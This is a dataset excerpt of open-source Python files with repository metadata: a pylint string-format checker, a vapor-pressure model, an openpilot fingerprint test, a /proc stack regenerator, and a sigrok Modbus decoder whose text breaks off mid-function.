| code (stringlengths, 3-1.05M) | repo_name (stringlengths, 5-104) | path (stringlengths, 4-251) | language (stringclasses, 1 value) | license (stringclasses, 15 values) | size (int64, 3-1.05M) |
|---|---|---|---|---|---|
# Copyright (c) 2009-2010 Arista Networks, Inc. - James Lingard
# Copyright (c) 2004-2013 LOGILAB S.A. (Paris, FRANCE).
# Copyright 2012 Google Inc.
#
# http://www.logilab.fr/ -- mailto:contact@logilab.fr
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""Checker for string formatting operations.
"""
import sys
import tokenize
import astroid
from pylint.interfaces import ITokenChecker, IAstroidChecker, IRawChecker
from pylint.checkers import BaseChecker, BaseTokenChecker
from pylint.checkers import utils
from pylint.checkers.utils import check_messages
_PY3K = sys.version_info >= (3, 0)
MSGS = {
'E1300': ("Unsupported format character %r (%#02x) at index %d",
"bad-format-character",
"Used when a unsupported format character is used in a format\
string."),
'E1301': ("Format string ends in middle of conversion specifier",
"truncated-format-string",
"Used when a format string terminates before the end of a \
conversion specifier."),
'E1302': ("Mixing named and unnamed conversion specifiers in format string",
"mixed-format-string",
"Used when a format string contains both named (e.g. '%(foo)d') \
and unnamed (e.g. '%d') conversion specifiers. This is also \
used when a named conversion specifier contains * for the \
minimum field width and/or precision."),
'E1303': ("Expected mapping for format string, not %s",
"format-needs-mapping",
"Used when a format string that uses named conversion specifiers \
is used with an argument that is not a mapping."),
'W1300': ("Format string dictionary key should be a string, not %s",
"bad-format-string-key",
"Used when a format string that uses named conversion specifiers \
is used with a dictionary whose keys are not all strings."),
'W1301': ("Unused key %r in format string dictionary",
"unused-format-string-key",
"Used when a format string that uses named conversion specifiers \
is used with a dictionary that contains keys not required by the \
format string."),
'E1304': ("Missing key %r in format string dictionary",
"missing-format-string-key",
"Used when a format string that uses named conversion specifiers \
is used with a dictionary that doesn't contain all the keys \
required by the format string."),
'E1305': ("Too many arguments for format string",
"too-many-format-args",
"Used when a format string that uses unnamed conversion \
specifiers is given too many arguments."),
'E1306': ("Not enough arguments for format string",
"too-few-format-args",
"Used when a format string that uses unnamed conversion \
specifiers is given too few arguments."),
}
OTHER_NODES = (astroid.Const, astroid.List, astroid.Backquote,
astroid.Lambda, astroid.Function,
astroid.ListComp, astroid.SetComp, astroid.GenExpr)
class StringFormatChecker(BaseChecker):
"""Checks string formatting operations to ensure that the format string
is valid and the arguments match the format string.
"""
__implements__ = (IAstroidChecker,)
name = 'string'
msgs = MSGS
@check_messages(*(MSGS.keys()))
def visit_binop(self, node):
if node.op != '%':
return
left = node.left
args = node.right
if not (isinstance(left, astroid.Const)
and isinstance(left.value, basestring)):
return
format_string = left.value
try:
required_keys, required_num_args = \
utils.parse_format_string(format_string)
except utils.UnsupportedFormatCharacter, e:
c = format_string[e.index]
self.add_message('bad-format-character', node=node, args=(c, ord(c), e.index))
return
except utils.IncompleteFormatString:
self.add_message('truncated-format-string', node=node)
return
if required_keys and required_num_args:
# The format string uses both named and unnamed format
# specifiers.
self.add_message('mixed-format-string', node=node)
elif required_keys:
# The format string uses only named format specifiers.
# Check that the RHS of the % operator is a mapping object
# that contains precisely the set of keys required by the
# format string.
if isinstance(args, astroid.Dict):
keys = set()
unknown_keys = False
for k, _ in args.items:
if isinstance(k, astroid.Const):
key = k.value
if isinstance(key, basestring):
keys.add(key)
else:
self.add_message('bad-format-string-key', node=node, args=key)
else:
# One of the keys was something other than a
# constant. Since we can't tell what it is,
# suppress checks for missing keys in the
# dictionary.
unknown_keys = True
if not unknown_keys:
for key in required_keys:
if key not in keys:
self.add_message('missing-format-string-key', node=node, args=key)
for key in keys:
if key not in required_keys:
self.add_message('unused-format-string-key', node=node, args=key)
elif isinstance(args, OTHER_NODES + (astroid.Tuple,)):
type_name = type(args).__name__
self.add_message('format-needs-mapping', node=node, args=type_name)
# else:
# The RHS of the format specifier is a name or
# expression. It may be a mapping object, so
# there's nothing we can check.
else:
# The format string uses only unnamed format specifiers.
# Check that the number of arguments passed to the RHS of
# the % operator matches the number required by the format
# string.
if isinstance(args, astroid.Tuple):
num_args = len(args.elts)
elif isinstance(args, OTHER_NODES + (astroid.Dict, astroid.DictComp)):
num_args = 1
else:
# The RHS of the format specifier is a name or
# expression. It could be a tuple of unknown size, so
# there's nothing we can check.
num_args = None
if num_args is not None:
if num_args > required_num_args:
self.add_message('too-many-format-args', node=node)
elif num_args < required_num_args:
self.add_message('too-few-format-args', node=node)
class StringMethodsChecker(BaseChecker):
__implements__ = (IAstroidChecker,)
name = 'string'
msgs = {
'E1310': ("Suspicious argument in %s.%s call",
"bad-str-strip-call",
"The argument to a str.{l,r,}strip call contains a"
" duplicate character, "),
}
@check_messages(*(MSGS.keys()))
def visit_callfunc(self, node):
func = utils.safe_infer(node.func)
if (isinstance(func, astroid.BoundMethod)
and isinstance(func.bound, astroid.Instance)
and func.bound.name in ('str', 'unicode', 'bytes')
and func.name in ('strip', 'lstrip', 'rstrip')
and node.args):
arg = utils.safe_infer(node.args[0])
if not isinstance(arg, astroid.Const):
return
if len(arg.value) != len(set(arg.value)):
self.add_message('bad-str-strip-call', node=node,
args=(func.bound.name, func.name))
class StringConstantChecker(BaseTokenChecker):
"""Check string literals"""
__implements__ = (ITokenChecker, IRawChecker)
name = 'string_constant'
msgs = {
'W1401': ('Anomalous backslash in string: \'%s\'. '
'String constant might be missing an r prefix.',
'anomalous-backslash-in-string',
'Used when a backslash is in a literal string but not as an '
'escape.'),
'W1402': ('Anomalous Unicode escape in byte string: \'%s\'. '
'String constant might be missing an r or u prefix.',
'anomalous-unicode-escape-in-string',
'Used when an escape like \\u is encountered in a byte '
'string where it has no effect.'),
}
# Characters that have a special meaning after a backslash in either
# Unicode or byte strings.
ESCAPE_CHARACTERS = 'abfnrtvx\n\r\t\\\'\"01234567'
# TODO(mbp): Octal characters are quite an edge case today; people may
# prefer a separate warning where they occur. \0 should be allowed.
# Characters that have a special meaning after a backslash but only in
# Unicode strings.
UNICODE_ESCAPE_CHARACTERS = 'uUN'
def process_module(self, module):
self._unicode_literals = 'unicode_literals' in module.future_imports
def process_tokens(self, tokens):
for (tok_type, token, (start_row, start_col), _, _) in tokens:
if tok_type == tokenize.STRING:
# 'token' is the whole un-parsed token; we can look at the start
# of it to see whether it's a raw or unicode string etc.
self.process_string_token(token, start_row, start_col)
def process_string_token(self, token, start_row, start_col):
for i, c in enumerate(token):
if c in '\'\"':
quote_char = c
break
prefix = token[:i].lower() # markers like u, b, r.
after_prefix = token[i:]
if after_prefix[:3] == after_prefix[-3:] == 3 * quote_char:
string_body = after_prefix[3:-3]
else:
string_body = after_prefix[1:-1] # Chop off quotes
# No special checks on raw strings at the moment.
if 'r' not in prefix:
self.process_non_raw_string_token(prefix, string_body,
start_row, start_col)
def process_non_raw_string_token(self, prefix, string_body, start_row,
start_col):
"""check for bad escapes in a non-raw string.
prefix: lowercase string of e.g. 'ur' string prefix markers.
string_body: the un-parsed body of the string, not including the quote
marks.
start_row: integer line number in the source.
start_col: integer column number in the source.
"""
# Walk through the string; if we see a backslash then escape the next
# character, and skip over it. If we see a non-escaped character,
# alert, and continue.
#
# Accept a backslash when it escapes a backslash, or a quote, or
# end-of-line, or one of the letters that introduce a special escape
# sequence <http://docs.python.org/reference/lexical_analysis.html>
#
# TODO(mbp): Maybe give a separate warning about the rarely-used
# \a \b \v \f?
#
# TODO(mbp): We could give the column of the problem character, but
# add_message doesn't seem to have a way to pass it through at present.
i = 0
while True:
i = string_body.find('\\', i)
if i == -1:
break
# There must be a next character; having a backslash at the end
# of the string would be a SyntaxError.
next_char = string_body[i+1]
match = string_body[i:i+2]
if next_char in self.UNICODE_ESCAPE_CHARACTERS:
if 'u' in prefix:
pass
elif (_PY3K or self._unicode_literals) and 'b' not in prefix:
pass # unicode by default
else:
self.add_message('anomalous-unicode-escape-in-string',
line=start_row, args=(match, ))
elif next_char not in self.ESCAPE_CHARACTERS:
self.add_message('anomalous-backslash-in-string',
line=start_row, args=(match, ))
# Whether it was a valid escape or not, backslash followed by
# another character can always be consumed whole: the second
# character can never be the start of a new backslash escape.
i += 2
def register(linter):
"""required method to auto register this checker """
linter.register_checker(StringFormatChecker(linter))
linter.register_checker(StringMethodsChecker(linter))
linter.register_checker(StringConstantChecker(linter))
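# Illustrative snippets (not from the original module) that the messages
# defined above would flag; all names and values here are hypothetical.
#
#   '%(key)s %s' % {'key': 1}   # E1302 mixed-format-string
#   '%s %s' % ('a',)            # E1306 too-few-format-args
#   '%s' % ('a', 'b')           # E1305 too-many-format-args
#   '%(a)s' % [1, 2]            # E1303 format-needs-mapping
#   'abc'.strip('aab')          # E1310 bad-str-strip-call ('a' duplicated)
#   path = 'C:\data'            # W1401 anomalous-backslash-in-string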
| hkupty/python-mode | pymode/libs/pylama/lint/pylama_pylint/pylint/checkers/strings.py | Python | lgpl-3.0 | 13,864 |
# -*- coding: utf-8 -*-
r"""
===============================================================================
Submodule -- vapor_pressure
===============================================================================
Methods for predicting the vapor pressure of pure species
"""
import scipy as sp
def antoine(phase, A, B, C, pore_temperature='pore.temperature', **kwargs):
r"""
Uses the Antoine equation [1]_ to estimate vapor pressure of a pure component
Parameters
----------
A, B, C : scalars
Antoine vapor pressure coefficients for pure compounds. Since virtually
all Antoine coefficients are reported in units of mmHg and C for
historical reasons, this method assumes these A, B and C values are for
mmHg and C, but converts all properties internally to return Pascals.
pore_temperature : string
The dictionary key containing the phase temperature values in Kelvin
[K]
[1] Antoine, C. (1888), Vapor Pressure: a new relationship between pressure
and temperature, Comptes Rendus des Séances de l'Académie des Sciences
(in French) 107: 681–684, 778–780, 836–837
"""
T = phase[pore_temperature] - 273.15
value = (10**(A-B/(C+T)))/760*101325
return value
def water(phase,
pore_temperature='pore.temperature',
pore_salinity='pore.salinity',
**kwargs):
r"""
Calculates vapor pressure of pure water or seawater given by [1]_ based on
Raoult's law. The pure water vapor pressure is given by [2]_
Parameters
----------
pore_temperature : string
The dictionary key containing the phase temperature values
pore_salinity : string
The dictionary key containing the phase salinity values
Returns
-------
The vapor pressure of water/seawater in [Pa]
Notes
-----
T must be in K, and S in g of salt per kg of phase, or ppt (parts per
thousand)
VALIDITY: 273 < T < 473 K; 0 < S < 240 g/kg;
ACCURACY: 0.5 %
References
----------
[1] Sharqawy M. H., Lienhard J. H., and Zubair, S. M., Desalination and
Water Treatment, 2010.
[2] ASHRAE handbook: Fundamentals, ASHRAE; 2005.
"""
T = phase[pore_temperature]
try:
S = phase[pore_salinity]
except KeyError:
S = 0
a1 = -5.8002206E+03
a2 = 1.3914993E+00
a3 = -4.8640239E-02
a4 = 4.1764768E-05
a5 = -1.4452093E-08
a6 = 6.5459673E+00
Pv_w = sp.exp((a1/T) + a2 + a3*T + a4*T**2 + a5*T**3 + a6*sp.log(T))
Pv_sw = Pv_w/(1+0.57357*(S/(1000-S)))
value = Pv_sw
return value
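# A minimal usage sketch (not part of the original module). Any dict-like
# object with temperatures in Kelvin under the expected key works as the
# phase here; the A/B/C values are the commonly quoted Antoine coefficients
# for water in mmHg/C form, and sp.array relies on the old scipy namespace
# aliases this module already uses.
if __name__ == '__main__':
    phase = {'pore.temperature': sp.array([298.15, 313.15])}
    print(antoine(phase, A=8.07131, B=1730.63, C=233.426))  # ~3.2 kPa at 25 C
    print(water(phase))  # no 'pore.salinity' key, so S defaults to 0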
| amdouglas/OpenPNM | OpenPNM/Phases/models/vapor_pressure.py | Python | mit | 2,624 |
#!/usr/bin/env python3
import os
import sys
from typing import Dict, List
from common.basedir import BASEDIR
# messages reserved for CAN based ignition (see can_ignition_hook function in panda/board/drivers/can)
# (addr, len)
CAN_IGNITION_MSGS = {
'gm': [(0x1F1, 8), (0x160, 5)],
#'tesla' : [(0x348, 8)],
}
def _get_fingerprints():
# read all the folders in selfdrive/car and return a dict where:
# - keys are all the car names we have a fingerprint dict for
# - values are dicts of fingerprints for each trim
fingerprints = {}
for car_folder in [x[0] for x in os.walk(BASEDIR + '/selfdrive/car')]:
car_name = car_folder.split('/')[-1]
try:
fingerprints[car_name] = __import__(f'selfdrive.car.{car_name}.values', fromlist=['FINGERPRINTS']).FINGERPRINTS
except (ImportError, OSError, AttributeError):
pass
return fingerprints
def check_fingerprint_consistency(f1, f2):
# return false if it finds a fingerprint fully included in another
# max message worth checking is 1800, as above that they usually come too
# infrequently and aren't usable for fingerprinting
max_msg = 1800
is_f1_in_f2 = True
for k in f1:
if (k not in f2 or f1[k] != f2[k]) and k < max_msg:
is_f1_in_f2 = False
is_f2_in_f1 = True
for k in f2:
if (k not in f1 or f2[k] != f1[k]) and k < max_msg:
is_f2_in_f1 = False
return not is_f1_in_f2 and not is_f2_in_f1
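# A hedged illustration of the rule above, using hypothetical fingerprints
# (not from any real car). In the first pair f1 is fully contained in f2
# for messages below 1800, so the pair is inconsistent:
#   check_fingerprint_consistency({0x100: 8}, {0x100: 8, 0x200: 4})            # -> False
#   check_fingerprint_consistency({0x100: 8, 0x300: 2}, {0x100: 8, 0x200: 4})  # -> True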
def check_can_ignition_conflicts(fingerprints, brands):
# loops through all the fingerprints and exits if CAN ignition dedicated messages
# are found in unexpected fingerprints
for brand_can, msgs_can in CAN_IGNITION_MSGS.items():
for i, f in enumerate(fingerprints):
for msg_can in msgs_can:
if brand_can != brands[i] and msg_can[0] in f and msg_can[1] == f[msg_can[0]]:
print("CAN ignition dedicated msg %d with len %d found in %s fingerprints!" % (msg_can[0], msg_can[1], brands[i]))
print("TEST FAILED")
sys.exit(1)
if __name__ == "__main__":
fingerprints = _get_fingerprints()
fingerprints_flat: List[Dict] = []
car_names = []
brand_names = []
for brand in fingerprints:
for car in fingerprints[brand]:
fingerprints_flat += fingerprints[brand][car]
for i in range(len(fingerprints[brand][car])):
car_names.append(car)
brand_names.append(brand)
# first check if CAN ignition specific messages are unexpectedly included in other fingerprints
check_can_ignition_conflicts(fingerprints_flat, brand_names)
valid = True
for idx1, f1 in enumerate(fingerprints_flat):
for idx2, f2 in enumerate(fingerprints_flat):
if idx1 < idx2 and not check_fingerprint_consistency(f1, f2):
valid = False
print(f"Those two fingerprints are inconsistent {car_names[idx1]} {car_names[idx2]}")
print("")
print(', '.join("%d: %d" % v for v in sorted(f1.items())))
print("")
print(', '.join("%d: %d" % v for v in sorted(f2.items())))
print("")
print(f"Found {len(fingerprints_flat)} individual fingerprints")
if not valid or len(fingerprints_flat) == 0:
print("TEST FAILED")
sys.exit(1)
else:
print("TEST SUCESSFUL")
| commaai/openpilot | selfdrive/test/test_fingerprints.py | Python | mit | 3,216 |
#!/usr/bin/env python
"""Handle records from /proc/self/stack data files"""
import regentest as RG
import ProcHandlers as PH
PFC = PH.ProcFieldConstants
# ---
def re_self_stack(inprecs):
"""Iterate through parsed records and re-generate data file"""
__template = "[<{addr:016x}>] {entry:s}"
for __hilit in inprecs:
__ff = inprecs.field
print __template.format(addr=__ff[PFC.F_ADDRESS],
entry=__ff[PFC.F_STACK_ENTRY])
#...+....1....+....2....+....3....+....4....+....5....+....6....+....7....+....8
RG.RECREATOR[PH.GET_HANDLER("/proc/self/stack")] = re_self_stack
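# Example of a regenerated line in the template above (address and symbol
# are illustrative, not from a real capture):
#   [<ffffffff810b1a2e>] do_wait+0x1ee/0x200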
| cnamejj/PyProc | regentest/self_stack.py | Python | gpl-2.0 | 619 |
##
## This file is part of the libsigrokdecode project.
##
## Copyright (C) 2015 Bart de Waal <bart@waalamo.com>
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, see <http://www.gnu.org/licenses/>.
##
import sigrokdecode as srd
from math import ceil
RX = 0
TX = 1
rxtx_channels = ('RX', 'TX')
class No_more_data(Exception):
'''This exception is a signal that we should stop parsing an ADU as there
is no more data to parse.'''
pass
class Data:
'''The Data class is used to hold the bytes from the serial decode.'''
def __init__(self, start, end, data):
self.start = start
self.end = end
self.data = data
class Modbus_ADU:
'''An Application Data Unit is what Modbus calls one message.
Protocol decoders are supposed to keep track of state and then provide
decoded data to the backend as it reads it. In Modbus' case, the state is
the ADU up to that point. This class represents the state and writes the
messages to the backend.
This class is for the common infrastructure between CS and SC. It should
not be used directly, only inherited from.'''
def __init__(self, parent, start, write_channel, annotation_prefix):
self.data = [] # List of all the data received up to now
self.parent = parent # Reference to the decoder object
self.start = start
self.last_read = start # The last moment parsed by this ADU object
self.write_channel = write_channel
self.last_byte_put = -1
self.annotation_prefix = annotation_prefix
# Any Modbus message needs to be at least 4 bytes long. The Modbus
# function may make this longer.
self.minimum_length = 4
# This variable is used by an external function to determine when the
# next frame should be started.
self.startNewFrame = False
# If there is an error in a frame, we'd like to highlight it. Keep
# track of errors.
self.hasError = False
def add_data(self, start, end, data):
'''Let the frame handle another piece of data.
start: start of this data
end: end of this data
data: data as received from the UART decoder'''
ptype, rxtx, pdata = data
self.last_read = end
if ptype == 'DATA':
self.data.append(Data(start, end, pdata[0]))
self.parse() # parse() is defined in the specific type of ADU.
def puti(self, byte_to_put, annotation, message):
'''This class keeps track of how much of the data has already been
annotated. This function tells the parent class to write message, but
only if it hasn't written about this bit before.
byte_to_put: Only write if it hasn't yet written byte_to_put. It will
write from the start of self.last_byte_put+1 to the end
of byte_to_put.
annotation: Annotation to write to, without annotation_prefix.
message: Message to write.'''
if byte_to_put > len(self.data) - 1:
# If the byte_to_put hasn't been read yet.
raise No_more_data
if annotation == 'error':
self.hasError = True
if byte_to_put > self.last_byte_put:
self.parent.puta(
self.data[self.last_byte_put + 1].start,
self.data[byte_to_put].end,
self.annotation_prefix + annotation,
message)
self.last_byte_put = byte_to_put
raise No_more_data
def putl(self, annotation, message, maximum=None):
'''Puts the last byte on the stack with message. The contents of the
last byte will be applied to message using format.'''
last_byte_address = len(self.data) - 1
if maximum is not None and last_byte_address > maximum:
return
self.puti(last_byte_address, annotation,
message.format(self.data[-1].data))
def close(self, message_overflow):
'''Function to be called when next message is started. As there is
always space between one message and the next, we can use that space
for errors at the end.'''
# TODO: Figure out how to make this happen for last message.
data = self.data
if len(data) < self.minimum_length:
if len(data) == 0:
# Sometimes happens with noise, safe to ignore.
return
self.parent.puta(
data[self.last_byte_put].end, message_overflow,
self.annotation_prefix + 'error',
'Message too short or not finished')
self.hasError = True
if self.hasError and self.parent.options['scchannel'] != self.parent.options['cschannel']:
# If we are decoding different channels (so client->server and
# server->client messages can be separated) we like to mark blocks
# containing errors. We don't do this when decoding the same
# channel as both a client->server and server->client frame, and
# one of those is bound to contain an error, making highlighting
# frames useless.
self.parent.puta(data[0].start, data[-1].end,
'error-indication', 'Frame contains error')
if len(data) > 256:
try:
self.puti(len(data) - 1, 'error',
'Modbus data frames are limited to 256 bytes')
except No_more_data:
pass
def check_crc(self, byte_to_put):
'''Check the CRC code, data[byte_to_put] is the 2nd byte of the CRC.'''
crc_byte1, crc_byte2 = self.calc_crc(byte_to_put)
data = self.data
if data[-2].data == crc_byte1 and data[-1].data == crc_byte2:
self.puti(byte_to_put, 'crc', 'CRC correct')
else:
self.puti(byte_to_put, 'error',
'CRC should be {} {}'.format(crc_byte1, crc_byte2))
def half_word(self, start):
'''Return the half word (16 bit) value starting at start bytes in. If
it goes out of range it raises the usual errors.'''
if (start + 1) > (len(self.data) - 1):
# If there isn't enough length to access data[start + 1].
raise No_more_data
return self.data[start].data * 0x100 + self.data[start + 1].data
def calc_crc(self, last_byte):
'''Calculate the CRC, as described in the spec.
The last byte of the CRC should be data[last_byte].'''
if last_byte < 3:
# Every Modbus ADU should be at least 4 bytes long, so we should never
# have to calculate a CRC on something shorter.
raise Exception('Could not calculate CRC: message too short')
result = 0xFFFF
magic_number = 0xA001 # As defined in the modbus specification.
for byte in self.data[:last_byte - 1]:
result = result ^ byte.data
for i in range(8):
LSB = result & 1
result = result >> 1
if (LSB): # If the LSB is true.
result = result ^ magic_number
byte1 = result & 0xFF
byte2 = (result & 0xFF00) >> 8
return (byte1, byte2)
def parse_write_single_coil(self):
'''Parse function 5, write single coil.'''
self.minimum_length = 8
self.puti(1, 'function', 'Function 5: Write Single Coil')
address = self.half_word(2)
self.puti(3, 'address',
'Address 0x{:X} / {:d}'.format(address, address + 10000))
raw_value = self.half_word(4)
value = 'Invalid Coil Value'
if raw_value == 0x0000:
value = 'Coil Value OFF'
elif raw_value == 0xFF00:
value = 'Coil Value ON'
self.puti(5, 'data', value)
self.check_crc(7)
def parse_write_single_register(self):
'''Parse function 6, write single register.'''
self.minimum_length = 8
self.puti(1, 'function', 'Function 6: Write Single Register')
address = self.half_word(2)
self.puti(3, 'address',
'Address 0x{:X} / {:d}'.format(address, address + 30000))
value = self.half_word(4)
value_formatted = 'Register Value 0x{0:X} / {0:d}'.format(value)
self.puti(5, 'data', value_formatted)
self.check_crc(7)
def parse_diagnostics(self):
'''Parse function 8, diagnostics. This function has many subfunctions,
but they are all more or less the same.'''
self.minimum_length = 8
self.puti(1, 'function', 'Function 8: Diagnostics')
diag_subfunction = {
0: 'Return Query data',
1: 'Restart Communications Option',
2: 'Return Diagnostics Register',
3: 'Change ASCII Input Delimiter',
4: 'Force Listen Only Mode',
10: 'Clear Counters and Diagnostic Register',
11: 'Return Bus Message Count',
12: 'Return Bus Communication Error Count',
13: 'Return Bus Exception Error Count',
14: 'Return Slave Message Count',
15: 'Return Slave No Response Count',
16: 'Return Slave NAK Count',
17: 'Return Slave Busy Count',
18: 'Return Bus Character Overrun Count',
20: 'Return Overrun Counter and Flag',
}
subfunction = self.half_word(2)
subfunction_name = diag_subfunction.get(subfunction,
'Reserved subfunction')
self.puti(3, 'data',
'Subfunction {}: {}'.format(subfunction, subfunction_name))
diagnostic_data = self.half_word(4)
self.puti(5, 'data',
'Data Field: {0} / 0x{0:04X}'.format(diagnostic_data))
self.check_crc(7)
def parse_mask_write_register(self):
'''Parse function 22, Mask Write Register.'''
self.minimum_length = 10
data = self.data
self.puti(1, 'function', 'Function 22: Mask Write Register')
address = self.half_word(2)
self.puti(3, 'address',
'Address 0x{:X} / {:d}'.format(address, address + 30001))
self.half_word(4) # To make sure we don't overflow data.
and_mask_1 = data[4].data
and_mask_2 = data[5].data
self.puti(5, 'data',
'AND mask: {:08b} {:08b}'.format(and_mask_1, and_mask_2))
self.half_word(6) # To make sure we don't overflow data.
or_mask_1 = data[6].data
or_mask_2 = data[7].data
self.puti(7, 'data',
'OR mask: {:08b} {:08b}'.format(or_mask_1, or_mask_2))
self.check_crc(9)
def parse_not_implemented(self):
'''Explicitly mark certain functions as legal functions, but not
implemented in this parser. This is due to the author not being able to
find anything (hardware or software) that supports these functions.'''
# TODO: Implement these functions.
# Mentioning which function it is, however, is no problem.
function = self.data[1].data
functionname = {
20: 'Read File Record',
21: 'Write File Record',
24: 'Read FIFO Queue',
43: 'Read Device Identification/Encapsulated Interface Transport',
}[function]
self.puti(1, 'function',
'Function {}: {} (not supported)'.format(function, functionname))
# From there on out we can keep marking it unsupported.
self.putl('data', 'This function is not currently supported')
class Modbus_ADU_SC(Modbus_ADU):
'''SC stands for Server -> Client.'''
def parse(self):
'''Select which specific Modbus function we should parse.'''
data = self.data
# This try-catch is being used as flow control.
try:
server_id = data[0].data
if 1 <= server_id <= 247:
message = 'Slave ID: {}'.format(server_id)
else:
message = 'Slave ID {} is invalid'.format(server_id)
self.puti(0, 'server-id', message)
function = data[1].data
if function == 1 or function == 2:
self.parse_read_bits()
elif function == 3 or function == 4 or function == 23:
self.parse_read_registers()
elif function == 5:
self.parse_write_single_coil()
elif function == 6:
self.parse_write_single_register()
elif function == 7:
self.parse_read_exception_status()
elif function == 8:
self.parse_diagnostics()
elif function == 11:
self.parse_get_comm_event_counter()
elif function == 12:
self.parse_get_comm_event_log()
elif function == 15 or function == 16:
self.parse_write_multiple()
elif function == 17:
self.parse_report_server_id()
elif function == 22:
self.parse_mask_write_register()
elif function in {20, 21, 24, 43}:
self.parse_not_implemented()
elif function > 0x80:
self.parse_error()
else:
self.puti(1, 'error',
'Unknown function: {}'.format(data[1].data))
self.putl('error', 'Unknown function')
# If the message gets here without raising an exception, the
# message goes on longer than it should.
self.putl('error', 'Message too long')
except No_more_data:
# Just a message saying we don't need to parse anymore this round.
pass
def parse_read_bits(self):
self.minimum_length = 5
data = self.data
function = data[1].data
if function == 1:
self.puti(1, 'function', 'Function 1: Read Coils')
else:
self.puti(1, 'function', 'Function 2: Read Discrete Inputs')
bytecount = self.data[2].data
self.minimum_length = 5 + bytecount # 3 before data, 2 CRC.
self.puti(2, 'length', 'Byte count: {}'.format(bytecount))
# From here on out, we expect registers on 3 and 4, 5 and 6 etc.
# So registers never start when the length is even.
self.putl('data', '{:08b}', bytecount + 2)
self.check_crc(bytecount + 4)
def parse_read_registers(self):
self.minimum_length = 5
data = self.data
function = data[1].data
if function == 3:
self.puti(1, 'function', 'Function 3: Read Holding Registers')
elif function == 4:
self.puti(1, 'function', 'Function 4: Read Input Registers')
elif function == 23:
self.puti(1, 'function', 'Function 23: Read/Write Multiple Registers')
bytecount = self.data[2].data
self.minimum_length = 5 + bytecount # 3 before data, 2 CRC.
if bytecount % 2 == 0:
self.puti(2, 'length', 'Byte count: {}'.format(bytecount))
else:
self.puti(2, 'error',
'Error: Odd byte count ({})'.format(bytecount))
# From here on out, we expect registers on 3 and 4, 5 and 6 etc.
# So registers never start when the length is even.
if len(data) % 2 == 1:
register_value = self.half_word(-2)
self.putl('data', '0x{0:04X} / {0}'.format(register_value),
bytecount + 2)
else:
raise No_more_data
self.check_crc(bytecount + 4)
def parse_read_exception_status(self):
self.minimum_length = 5
self.puti(1, 'function', 'Function 7: Read Exception Status')
exception_status = self.data[2].data
self.puti(2, 'data',
'Exception status: {:08b}'.format(exception_status))
self.check_crc(4)
def parse_get_comm_event_counter(self):
self.minimum_length = 8
self.puti(1, 'function', 'Function 11: Get Comm Event Counter')
status = self.half_word(2)
if status == 0x0000:
self.puti(3, 'data', 'Status: not busy')
elif status == 0xFFFF:
self.puti(3, 'data', 'Status: busy')
else:
self.puti(3, 'error', 'Bad status: 0x{:04X}'.format(status))
count = self.half_word(4)
self.puti(5, 'data', 'Event Count: {}'.format(count))
self.check_crc(7)
def parse_get_comm_event_log(self):
self.minimum_length = 11
self.puti(1, 'function', 'Function 12: Get Comm Event Log')
data = self.data
bytecount = data[2].data
self.puti(2, 'length', 'Bytecount: {}'.format(bytecount))
# The bytecount is the length of everything except the slaveID,
# function code, bytecount and CRC.
self.minimum_length = 5 + bytecount
status = self.half_word(3)
if status == 0x0000:
self.puti(4, 'data', 'Status: not busy')
elif status == 0xFFFF:
self.puti(4, 'data', 'Status: busy')
else:
self.puti(4, 'error', 'Bad status: 0x{:04X}'.format(status))
event_count = self.half_word(5)
self.puti(6, 'data', 'Event Count: {}'.format(event_count))
message_count = self.half_word(7)
self.puti(8, 'data', 'Message Count: {}'.format(message_count))
self.putl('data', 'Event: 0x{:02X}'.format(data[-1].data),
bytecount + 2)
self.check_crc(bytecount + 4)
def parse_write_multiple(self):
'''Function 15 and 16 are almost the same, so we can parse them both
using one function.'''
self.minimum_length = 8
function = self.data[1].data
if function == 15:
data_unit = 'Coils'
max_outputs = 0x07B0
long_address_offset = 10001
elif function == 16:
data_unit = 'Registers'
max_outputs = 0x007B
long_address_offset = 30001
self.puti(1, 'function',
'Function {}: Write Multiple {}'.format(function, data_unit))
starting_address = self.half_word(2)
# Some instruction manuals use a long form name for addresses, this is
# listed here for convenience.
address_name = long_address_offset + starting_address
self.puti(3, 'address',
'Start at address 0x{:X} / {:d}'.format(starting_address,
address_name))
quantity_of_outputs = self.half_word(4)
if quantity_of_outputs <= max_outputs:
self.puti(5, 'data',
'Write {} {}'.format(quantity_of_outputs, data_unit))
else:
self.puti(5, 'error',
'Bad value: {} {}. Max is {}'.format(quantity_of_outputs,
data_unit, max_outputs))
self.check_crc(7)
def parse_report_server_id(self):
# Buildup of this function:
# 1 byte serverID
# 1 byte function (17)
# 1 byte bytecount
# 1 byte serverID (counts for bytecount)
# 1 byte Run Indicator Status (counts for bytecount)
# bytecount - 2 bytes of device specific data (counts for bytecount)
# 2 bytes of CRC
self.minimum_length = 7
data = self.data
self.puti(1, 'function', 'Function 17: Report Server ID')
bytecount = data[2].data
self.puti(2, 'length', 'Data is {} bytes long'.format(bytecount))
self.puti(3, 'data', 'serverID: {}'.format(data[3].data))
run_indicator_status = data[4].data
if run_indicator_status == 0x00:
self.puti(4, 'data', 'Run Indicator status: Off')
elif run_indicator_status == 0xFF:
self.puti(4, 'data', 'Run Indicator status: On')
else:
self.puti(4, 'error',
'Bad Run Indicator status: 0x{:X}'.format(run_indicator_status))
self.putl('data', 'Device specific data: {}, "{}"'.format(data[-1].data,
chr(data[-1].data)), 2 + bytecount)
self.check_crc(4 + bytecount)
def parse_error(self):
'''Parse a Modbus error message.'''
self.minimum_length = 5
# The function code of an error is always 0x80 above the function call
# that caused it.
functioncode = self.data[1].data - 0x80
functions = {
1: 'Read Coils',
2: 'Read Discrete Inputs',
3: 'Read Holding Registers',
4: 'Read Input Registers',
5: 'Write Single Coil',
6: 'Write Single Register',
